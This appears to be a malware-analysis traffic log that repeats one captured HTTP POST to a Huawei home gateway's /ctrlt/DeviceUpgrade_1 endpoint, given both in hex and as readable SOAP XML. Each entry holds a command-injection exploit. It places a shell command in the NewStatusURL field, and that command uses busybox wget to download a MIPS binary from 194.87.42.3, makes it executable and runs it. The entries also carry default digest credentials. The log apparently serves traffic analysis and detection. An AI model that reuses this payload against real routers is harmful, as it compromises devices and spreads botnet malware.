                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
